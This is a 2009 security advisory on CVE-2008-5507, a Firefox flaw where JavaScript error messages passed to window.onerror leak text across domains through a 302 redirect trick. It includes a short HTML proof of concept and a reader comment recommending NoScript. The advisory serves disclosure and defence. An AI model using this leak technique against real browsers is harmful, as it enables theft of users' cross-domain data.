A vulnerability in the way Firefox handles JavaScript loaded through the src attribute of a script tag, without properly restricting error reporting to the same domain, allows attackers to access information that is outside their domain restriction, which in turn can be used to perform cross-domain theft.
Credit:
The information has been provided by Chris Evans.
The original article can be found at: http://scary.beasts.org/security/CESA-2008-011.html
Firefox 2.0.0.19 and 3.0.5 fix a cross-domain theft of textual data. The theft is via cross-domain information leaks in JavaScript error messages for scripts executed via <script src="remote_domain.org">. The JavaScript error messages are made available to the window.onerror handler. In some cases, JavaScript error messages can contain pieces of text from the remote domain as part of the error message, e.g. "blah is not defined". This permits certain textual constructs to be stolen cross-domain.
The broader issue was fixed in Firefox 3.0. However, this fix was not complete. The fix could be dodged by using another instance of the "302 redirect trick". It was possible to cause the browser to believe a remote script was in fact local, and therefore continue to reveal JavaScript error messages.
Proof of concept:
<html>
<body>
You should see an alert box containing a (potentially) sensitive many-bits
hex string stolen cross-domain.
<script>
  window.onerror = function(message, uri, line) {
    var fullMessage = message + "\n at " + uri + ": " + line;
    alert(fullMessage);
    return false;
  }
</script>
<script src="../redir?url=http://vsftpd.beasts.org/steal_me/hex.txt">
</script>
</body>
</html>
CVE Information:
CVE-2008-5507
Subject: Cross-Domain Text Theft SeaMonkey FireFox
Date: 23 Jan. 2009
From: wmahiyahoo.com
Hi,
This problem has been around for quite a while.
Many sites talk about it but none that I have found suggests an easy way to STOP IT.
I emailed Chris Evans with the fix but he too seems to just care about finding security problems and will not add the Fix to his page.
"NoScript" is a plug-in for both SeaMonkey and FireFox.
It works on this security problem.
The one thing I suggest to all is, after installing "NoScript", to delete everything in the "White List" and only add truly safe sites.
Have a Great Day
Bill MacGregor
K.I.S.S. CO. Security LLC.
Ps
I sure hope you post this or just the Link to NoScript.
http://noscript.net/